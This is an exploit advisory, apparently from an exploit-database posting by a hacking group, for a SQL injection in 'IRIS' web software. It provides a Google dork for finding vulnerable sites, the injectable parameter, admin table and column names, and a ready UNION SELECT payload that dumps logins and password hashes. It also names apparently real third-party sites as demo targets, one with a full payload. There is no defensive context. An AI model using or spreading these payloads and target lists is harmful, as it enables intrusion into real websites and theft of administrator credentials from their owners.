############################################################################
# Exploit Title: IRIS SQL Injection Vulnerability
# Google Dork: intext:"Powered by iris"
# Date: 6/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Vendor Software: www.iris.tn
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
#
#
# Exploit:
#
#
# [~] SQL Injection:
#
# http://[target]/services.php?id=[SQLi]
#
#
# table for admin user :app_users
# column for users_tab :id_user,login,pwd
#
# [~] SQLi :
#
# -1+union+select+1,2,3,group_concat(id_user,0x3a,login,0x3a,pwd),5,6,7,8,9,10,11,12,13,14,15+from+app_users--
#
#
# Demo:
#
# www.luxcaronline.com/services.php?id=[SQLi]
#
# www.yazproduction.com/services.php?id=-1+union+select+1,2,group_concat(login,0x3a,pwd),4,5,6,7+from+admin_users--
#
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...
############################################################################
GreetZ : All H4ckCity Member - BHG Members - 1337day.com
############################################################################